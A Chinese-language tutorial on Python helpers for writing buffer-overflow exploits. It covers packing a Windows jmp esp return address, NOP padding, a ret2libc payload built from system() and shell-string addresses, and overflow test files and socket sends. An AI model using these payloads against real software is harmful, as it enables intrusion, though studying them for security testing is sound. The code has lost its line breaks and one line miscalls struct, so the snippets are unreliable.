用 Python 写 Exploit
struct 模块有个很方便的函数,pack,格式如下:
struct.pack(format,参数)
将参数内容转换成 format 中指定的格式。写 shellcode 时,需要将覆盖地址倒序(little-endian)排列,为了方便,咱们可以使用这个函数。咱们要用到的指定格式是"<L”,以无符号长整型的 little-endian 格式。
0x7ffa4512 是通杀 Windows 2000/XP/2003 的 jmp esp 地址,以它为例:
import struct struct.pack('<L',0x7ffa4512)
溢出测试时,常常需要生成一长串字符串去填充缓冲区,用循环的话比较麻烦。Python 中直接可以用乘号来操作字符串:
shellcode = '\x90' * 1000
执行后,shellcode 的值为1000个 \x90。
同时也可以用加号来操作字符串,连接两个字符串的例子如下:
import struct buffer = 'A' * 100 jmpesp = struct('<L', 0x7ffa4512) #将0x7ffa4512转化为\x12\x45\xfa\x7f的格式 buffer += jmpesp
在 Python 中“+=”与 C 语言中的“+=”用法一样,buffer += jmpesp 等同于 buffer = buffer + jmpesp,当然也可以用后者来表示。
注意如果用的 Python3,想要以二进制格式打印字符,需要 sys.stdout.buffer.write,示范如下:
import sys import struct system_addr = 0xf7e2b010 + 0x6000 sh_str_addr = 0xf7f43fa6 + 0x6000 shellcode = b"A" * 11 shellcode += struct.pack("<L", system_addr) shellcode += b"AAAA" shellcode += struct.pack("<L", sh_str_addr) sys.stdout.buffer.write(shellcode)
ord 函数可用于将指定字符转换成 ASCII 码,函数声明:ord(字符)
例:
print(ord('A')) # 输出:65
注意 ord 函数只接受字符,不能接受字符串。
对读取文件时发生溢出的程序来说,需要生成一个带有测试代码的文件。Python 提供了方便的文件操作函数。
with open('test', 'w') as f: payload = 'A' * 5000 f.write(payload)
执行以上代码后,会在当前目录下生成一个内容为5000个 A 的、文件名为 test 的文件。
有时需要对网络程序进行安全性测试,Python 也提供了 socket 编程。需要使用 socket 模板。
import socket shellcode = 'A' * 1000 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("127.0.0.1", 200)) s.send(shellcode)
该例子可以用在 FTP Server 之类的网络程序进行测试。